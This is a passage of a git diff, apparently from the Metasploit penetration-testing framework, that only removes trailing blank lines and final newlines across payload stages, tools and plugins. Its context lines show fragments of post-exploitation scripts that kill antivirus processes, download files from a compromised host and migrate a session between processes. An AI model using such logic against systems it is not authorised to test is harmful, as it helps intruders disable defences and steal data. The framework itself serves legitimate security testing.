b/modules/payloads/stages/windows/dllinject.rb @@ -23,6 +23,4 @@ module Metasploit3 include Msf::Payload::Windows::DllInject -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index a5daab5612..39e9254348 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -87,6 +87,4 @@ module Metasploit3 end end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 37246e90dc..410f109e9e 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -72,6 +72,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 2c69838be7..4c6da73729 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -92,6 +92,4 @@ module Metasploit3 super end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index e2a3ea0c18..22ee9fd0fa 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -115,6 +115,4 @@ module Metasploit3 super end -end - - +end \ No newline at end of file diff --git a/msfcli b/msfcli index efe80ab01d..8c4ae8fa0c 100755 --- a/msfcli +++ b/msfcli @@ -252,4 +252,4 @@ case mode.downcase usage("Invalid mode #{mode}") end -$stdout.puts +$stdout.puts \ No newline at end of file diff --git a/msfconsole b/msfconsole index d324d0bb12..5562bf5519 100755 --- a/msfconsole +++ b/msfconsole @@ -81,4 +81,4 @@ begin options ).run rescue Interrupt -end +end \ No newline at end of file diff --git a/msfd b/msfd index 244162a5d8..42e870a414 100755 --- a/msfd +++ b/msfd @@ -53,4 +53,4 @@ rescue ::NotImplementedError end # Run the plugin instance in the foreground. -$framework.plugins.load('msfd', opts).run +$framework.plugins.load('msfd', opts).run \ No newline at end of file diff --git a/msfelfscan b/msfelfscan index 44900dc375..3e57851308 100755 --- a/msfelfscan +++ b/msfelfscan @@ -101,4 +101,4 @@ ARGV.each do |file| elf.close -end +end \ No newline at end of file diff --git a/msfencode b/msfencode index 1efc396f09..626361df10 100755 --- a/msfencode +++ b/msfencode @@ -195,4 +195,4 @@ case cmd } $stderr.puts(OutError + "No encoders succeeded.") -end +end \ No newline at end of file diff --git a/msfgui b/msfgui index d0279d7a63..fe325fd8b2 100755 --- a/msfgui +++ b/msfgui @@ -106,6 +106,4 @@ $stderr.puts "[*] Debugging mode is enabled" ENV['LANG'] = 'C' # Create the driver instance and run it. -Msf::Ui::Gtk2::Driver.new(opts).run - - +Msf::Ui::Gtk2::Driver.new(opts).run \ No newline at end of file diff --git a/msfmachscan b/msfmachscan index 09ae1285c7..4836d88279 100755 --- a/msfmachscan +++ b/msfmachscan @@ -88,5 +88,4 @@ ARGV.each do |file| end end -#end - +#end \ No newline at end of file diff --git a/msfopcode b/msfopcode index 62b1529404..3d3ee30b99 100755 --- a/msfopcode +++ b/msfopcode @@ -362,5 +362,4 @@ case cmd puts("\n" + tbl.to_s + "\n") else $stderr.puts("Unsupported command: #{cmd}") -end - +end \ No newline at end of file diff --git a/msfpayload b/msfpayload index d3ece1f8ff..964e59ccf3 100755 --- a/msfpayload +++ b/msfpayload @@ -144,4 +144,4 @@ if (cmd =~ /^(p|y|r|c|j|x|b)/) elsif (cmd =~ /^(s|o)/) puts Msf::Serializer::ReadableText.dump_module(payload) -end +end \ No newline at end of file diff --git a/msfpescan b/msfpescan index aca1d02b7b..e29c1bfc9f 100755 --- a/msfpescan +++ b/msfpescan @@ -141,4 +141,4 @@ ARGV.each do |file| pe.close -end +end \ No newline at end of file diff --git a/msfweb b/msfweb index 93ba525bd3..cb148cea11 100755 --- a/msfweb +++ b/msfweb @@ -79,5 +79,4 @@ $stderr.puts "" $stderr.puts "[*] Starting msfweb v#{Msf::Framework::Version} on #{$browser_url}" $stderr.puts "" -load(msfserv) - +load(msfserv) \ No newline at end of file diff --git a/plugins/db_mysql.rb b/plugins/db_mysql.rb index 69e84f4cdc..28c040185c 100644 --- a/plugins/db_mysql.rb +++ b/plugins/db_mysql.rb @@ -234,4 +234,4 @@ class Plugin::DBMySQL < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/db_postgres.rb b/plugins/db_postgres.rb index 422754d97c..fc509b01c8 100644 --- a/plugins/db_postgres.rb +++ b/plugins/db_postgres.rb @@ -226,4 +226,4 @@ class Plugin::DBPostgres < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/db_sqlite2.rb b/plugins/db_sqlite2.rb index d7176c4f6e..d5d83d1eb0 100644 --- a/plugins/db_sqlite2.rb +++ b/plugins/db_sqlite2.rb @@ -169,4 +169,4 @@ class Plugin::DBSQLite2 < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/db_sqlite3.rb b/plugins/db_sqlite3.rb index a227f1c8b4..5bc5fb7862 100644 --- a/plugins/db_sqlite3.rb +++ b/plugins/db_sqlite3.rb @@ -175,4 +175,4 @@ class Plugin::DBSQLite3 < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/db_tracker.rb b/plugins/db_tracker.rb index 2a80c47da8..85f831efb5 100644 --- a/plugins/db_tracker.rb +++ b/plugins/db_tracker.rb @@ -60,4 +60,4 @@ class Plugin::DB_Tracer < Msf::Plugin end end -end +end \ No newline at end of file diff --git a/plugins/db_wmap.rb b/plugins/db_wmap.rb index fc00567f53..5742609776 100644 --- a/plugins/db_wmap.rb +++ b/plugins/db_wmap.rb @@ -89,4 +89,4 @@ class Plugin::DBWmap < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb index 369c7bb678..5e57cb8e88 100644 --- a/plugins/ips_filter.rb +++ b/plugins/ips_filter.rb @@ -111,4 +111,4 @@ module SocketTracer ] end -end +end \ No newline at end of file diff --git a/plugins/msfd.rb b/plugins/msfd.rb index 98a16ecf07..cab27c221f 100644 --- a/plugins/msfd.rb +++ b/plugins/msfd.rb @@ -124,4 +124,4 @@ protected end -end +end \ No newline at end of file diff --git a/plugins/sample.rb b/plugins/sample.rb index fa8a15f09d..0d69dc675c 100644 --- a/plugins/sample.rb +++ b/plugins/sample.rb @@ -89,4 +89,4 @@ class Plugin::Sample < Msf::Plugin protected end -end +end \ No newline at end of file diff --git a/plugins/session_tagger.rb b/plugins/session_tagger.rb index d289ed4f29..9ad49b515d 100644 --- a/plugins/session_tagger.rb +++ b/plugins/session_tagger.rb @@ -49,4 +49,4 @@ class Plugin::SessionTagger < Msf::Plugin end end -end +end \ No newline at end of file diff --git a/plugins/socket_logger.rb b/plugins/socket_logger.rb index a3ffe679a8..4c9d48a28a 100644 --- a/plugins/socket_logger.rb +++ b/plugins/socket_logger.rb @@ -104,4 +104,4 @@ module SocketTracer end end -end +end \ No newline at end of file diff --git a/plugins/thread.rb b/plugins/thread.rb index 6079536303..ec457028c9 100644 --- a/plugins/thread.rb +++ b/plugins/thread.rb @@ -128,6 +128,4 @@ class Plugin::ThreadTest < Msf::Plugin protected end -end - - +end \ No newline at end of file diff --git a/scripts/meterpreter/get_local_subnets.rb b/scripts/meterpreter/get_local_subnets.rb index 80e7d9e623..32a19cb8b8 100644 --- a/scripts/meterpreter/get_local_subnets.rb +++ b/scripts/meterpreter/get_local_subnets.rb @@ -8,5 +8,4 @@ client.net.config.each_route { |route| next if route.subnet =~ /^(224\.|127\.)/ next if route.netmask == '255.255.255.255' print_line("Local subnet: #{route.subnet}/#{route.netmask}") -} - +} \ No newline at end of file diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb index fbc1e9ea81..09b62146a2 100644 --- a/scripts/meterpreter/killav.rb +++ b/scripts/meterpreter/killav.rb @@ -687,5 +687,4 @@ client.sys.process.get_processes().each do |x| print_status("Killing off #{x['name']}...") client.sys.process.kill(x['pid']) end -end - +end \ No newline at end of file diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb index 72ae08c78f..3eb2be43ee 100644 --- a/scripts/meterpreter/migrate.rb +++ b/scripts/meterpreter/migrate.rb @@ -24,4 +24,4 @@ client.core.migrate(target_pid) server = client.sys.process.open -print_status("New server process: #{server.name} (#{server.pid})") +print_status("New server process: #{server.name} (#{server.pid})") \ No newline at end of file diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index 2f1b88c2a7..1bf2a885a0 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -56,5 +56,4 @@ def scan(path) client.fs.file.download_file(dst, fullpath) end } -end - +end \ No newline at end of file diff --git a/tools/convert_31.rb b/tools/convert_31.rb index b3617ac8f3..ff96cca9d0 100755 --- a/tools/convert_31.rb +++ b/tools/convert_31.rb @@ -45,4 +45,4 @@ outp << "\n" fd = File.open(path, "w") fd.write(outp) -fd.close +fd.close \ No newline at end of file diff --git a/tools/module_license.rb b/tools/module_license.rb index 87e5fc4f64..c2e8e4984b 100755 --- a/tools/module_license.rb +++ b/tools/module_license.rb @@ -64,4 +64,4 @@ $framework.auxiliary.each_module { |name, mod| tbl << [ lic_short(x.license), 'Auxiliary', name ] } -puts tbl.to_s +puts tbl.to_s \ No newline at end of file diff --git a/tools/module_reference.rb b/tools/module_reference.rb index ac3a5566e3..09d28c5e6d 100755 --- a/tools/module_reference.rb +++ b/tools/module_reference.rb @@ -57,4 +57,4 @@ $framework.auxiliary.each_module { |name, mod| end } -puts tbl.to_s +puts tbl.to_s \ No newline at end of file diff --git a/tools/msf_irb_shell.rb b/tools/msf_irb_shell.rb index f797335d0b..0381237f7b 100755 --- a/tools/msf_irb_shell.rb +++ b/tools/msf_irb_shell.rb @@ -10,4 +10,4 @@ require 'msf/ui' framework = Msf::Simple::Framework.create -Rex::Ui::Text::IrbShell.new(binding).run +Rex::Ui::Text::IrbShell.new(binding).run \ No newline at end of file diff --git a/tools/nasm_shell.rb b/tools/nasm_shell.rb index 198f08e5e4..95986543ee 100755 --- a/tools/nasm_shell.rb +++ b/tools/nasm_shell.rb @@ -34,4 +34,4 @@ shell.run { |line| rescue RuntimeError puts "Error: #{$!}" end -} +} \ No newline at end of file diff --git a/tools/pattern_create.rb b/tools/pattern_create.rb index 72e9da86c2..7c0c5de2f1 100755 --- a/tools/pattern_create.rb +++ b/tools/pattern_create.rb @@ -13,4 +13,4 @@ end # sets. sets = ARGV.length > 0 ? ARGV : Rex::Text::DefaultPatternSets -puts Rex::Text.pattern_create(length.to_i, sets) +puts Rex::Text.pattern_create(length.to_i, sets) \ No newline at end of file diff --git a/tools/pattern_offset.rb b/tools/pattern_offset.rb index bef5a8facc..726c3727a6 100755 --- a/tools/pattern_offset.rb +++ b/tools/pattern_offset.rb @@ -17,4 +17,4 @@ len = ARGV.shift || 8192 value = value.hex if (value.length >= 8 and value.hex > 0) buffer = Rex::Text.pattern_create(len.to_i) -puts Rex::Text.pattern_offset(buffer, value) +puts Rex::Text.pattern_offset(buffer, value) \ No newline at end of file